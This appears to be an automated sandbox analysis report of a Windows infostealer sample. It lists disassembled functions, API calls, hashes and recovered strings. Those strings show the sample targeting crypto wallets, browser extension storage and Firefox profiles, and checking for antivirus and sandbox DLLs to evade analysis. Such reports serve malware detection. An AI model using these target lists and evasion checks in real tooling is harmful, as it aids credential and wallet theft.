4019c9 3920->3928 3930 401a19-401a25 3922->3930 3923->3930 3924->3889 3925->3926 3931 401adc-401ae1 3925->3931 3940 402363-4023c3 call 410200 * 4 call 401480 3926->3940 3941 402266-402285 3926->3941 3928->3906 3937 401a27-401a2e 3930->3937 3938 401a48-401a4f 3930->3938 3931->3926 3939 401ae7-401aea 3931->3939 3948 401a30 3937->3948 3949 401a33-401a46 memcmp 3937->3949 3951 401a51-401a54 3938->3951 3952 401a57-401a62 3938->3952 3939->3926 3950 401af0 3939->3950 4002 4023c8-4023f0 call 410230 * 4 3940->4002 3953 402290-40234b call 410200 * 7 call 401730 3941->3953 4053 401913-401918 call 410230 3943->4053 4054 401f54-401fe7 call 4101c0 call 410340 * 2 call 4102e0 call 410340 call 410290 call 410230 * 4 3943->4054 4060 401be8-401beb 3944->4060 4061 4021df-4021ef call 410230 * 2 3944->4061 3948->3949 3949->3938 3949->3952 3950->3916 3951->3952 3952->3905 3960 401a64-401a73 3952->3960 4031 402350-40235d 3953->4031 3967 401a75-401a77 3960->3967 3968 401a9e-401aa4 ??3@YAXPAX@Z 3960->3968 3967->3926 3974 401a7d-401a82 3967->3974 3968->3905 3974->3926 3981 401a88-401a8d 3974->3981 3981->3926 3982 401a93-401a96 3981->3982 3982->3926 3989 401a9c 3982->3989 3989->3968 4031->3940 4031->3953 4053->3919 4105 402001-4020e6 call 410340 call 410290 call 410230 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA call 410200 call 4076b0 4054->4105 4106 401fe9-401ffc call 410340 call 410290 call 410230 4054->4106 4064 401c4a-401c9b call 410340 * 2 call 410290 call 410230 * 2 call 410200 call 411520 4060->4064 4061->3889 4097 401c9d-401e0f call 4101c0 call 410340 * 2 call 4102e0 call 410340 call 410290 call 410230 * 4 call 410340 call 410290 call 410230 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA call 410200 call 4076b0 4064->4097 4098 401c2f-401c44 FindNextFileA 4064->4098 4232 401bf0-401c2a call 410530 DeleteFileA call 4104e0 * 2 call 411250 call 410230 * 2 4097->4232 4233 401e15-401eb0 call 410200 * 5 call 413e50 call 410230 4097->4233 4098->4064 4101 401900-401910 FindClose call 410230 4098->4101 4101->4053 4190 402181-4021ba call 410530 DeleteFileA call 4104e0 * 2 call 411250 call 410230 4105->4190 4191 4020ec-40217c call 410200 * 5 call 413e50 call 410230 4105->4191 4106->4105 4190->3924 4191->4190 4232->4098 4233->4232
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,00000028,00000028,00000028,P#@,?,00420BBE,?,?,?,00420BBE,P#@,?,00000028,00000028,?), ref: 004018D4
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00401970
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileFindFirstlstrcpystrlen
                                                                                                                                                                                                                                                                                • String ID: C:\ProgramData\$P#@$P#@$Wallets$\*.*
                                                                                                                                                                                                                                                                                • API String ID: 2655114730-2645412951
                                                                                                                                                                                                                                                                                • Opcode ID: 0392e0cbbb74c3f63e79c827141e62e095c897f05b3910d11131e3b73294b9ba
                                                                                                                                                                                                                                                                                • Instruction ID: f6b8f89bdbb38ad25dbe9b200cedc7393f8838c2c48d913623183ff2efa6fcc7
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0392e0cbbb74c3f63e79c827141e62e095c897f05b3910d11131e3b73294b9ba
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C572B931A102185BCF14EBA1CD959EEB779AF44304F40409EF9066B192DF7CAEC5CBA9
                                                                                                                                                                                                                                                                                Function 0040A5D0 Relevance: 32.0, APIs: 7, Strings: 11, Instructions: 509filestringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,?,?,0042150A), ref: 0040A63D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040A738
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlenmemmovestrlen
                                                                                                                                                                                                                                                                                • String ID: C:\ProgramData\$CURRENT$IndexedDB$Local Extension Settings$Opera$Plugins$Sync Extension Settings$Wallets$\*.*$_0.indexeddb.leveldb$chrome-extension_
                                                                                                                                                                                                                                                                                • API String ID: 1425610001-450108884
                                                                                                                                                                                                                                                                                • Opcode ID: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                                • Instruction ID: 1a3cb996083095315d2ff66196e58a8cf7e0966e26cbd8d21691459e5d96898c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 841243316102589BCB14EBA1CD95AEE7779AF54308F40009EF5066B182DFBC6EC5CBA9
                                                                                                                                                                                                                                                                                Function 0040C790 Relevance: 30.4, APIs: 13, Strings: 4, Instructions: 614stringfileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 0040C80A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040C893
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 0040C8C2
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040C91D
                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C94B
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C9AE
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$lstrcatmemcmpstrlen$??3@FileFindFirstlstrlenmemmove
                                                                                                                                                                                                                                                                                • String ID: C:\ProgramData\$\..\$prefs.js$profiles.ini
                                                                                                                                                                                                                                                                                • API String ID: 3809920955-2608480989
                                                                                                                                                                                                                                                                                • Opcode ID: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                                • Instruction ID: 416ba331a07f3905739cc071a47e34269f16b80876d8e7813359335a266a51ee
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4932D7319002189BCB14EBB1C9D5AEEB778BF48304F40455EF41667192DF7CAAC9CBA9
                                                                                                                                                                                                                                                                                Function 004170D0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 117stringfileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileFindstrcpy$strlenwsprintf$CloseFirstFolderNextOperationPath_splitpathisupper
                                                                                                                                                                                                                                                                                • String ID: %s\%s$%s\*$.
                                                                                                                                                                                                                                                                                • API String ID: 3519957579-2663966076
                                                                                                                                                                                                                                                                                • Opcode ID: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                                • Instruction ID: 114bed65e9d4b9d73eb4094e4860af952423d6fe10318c0fdbdbb5acdc2bd80f
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf9b2e7014ef6816a469ec533b7518abd9e477652080199a49752e259d229905
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8413B71908348AFD2209B21DC05BEB77BCAFD5304F04452EF99982251E779A689C7AB
                                                                                                                                                                                                                                                                                Function 004011F0 Relevance: 25.6, APIs: 6, Strings: 11, Instructions: 110stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,avghookx.dll,?,?,?,004185FC), ref: 0040121E
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,avghooka.dll,?,?,?,004185FC), ref: 0040124E
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,snxhk.dll,?,?,?,004185FC), ref: 0040127E
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,sbiedll.dll,?,?,?,004185FC), ref: 004012AE
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,api_log.dll,?,?,?,004185FC), ref: 004012DE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004011B0: lstrcmpiW.KERNEL32(?,?,771AF360,?,?,?,00401320,pstorec.dll,?,?,?,004185FC), ref: 004011DA
                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,dir_watch.dll,?,?,?,004185FC), ref: 0040130E
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                                                                                                                                                                                                                                                                • API String ID: 1586166983-3272603366
                                                                                                                                                                                                                                                                                • Opcode ID: b3d858f19f8d577d2ca6532e9e1bf2584ef083a26a7cebbf2994b5fa81393a97
                                                                                                                                                                                                                                                                                • Instruction ID: 41c0b1b83a52b27a2bdfeff9d3ed397a321de4e9cb8fcf5d4a551c39b82ef4d0
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3d858f19f8d577d2ca6532e9e1bf2584ef083a26a7cebbf2994b5fa81393a97
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D431AD323413509BCB119B05C8C0F253362AF99B98FAE01F6E902BB7B7D27C9C41865D
                                                                                                                                                                                                                                                                                Function 00404280 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 173networkfileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
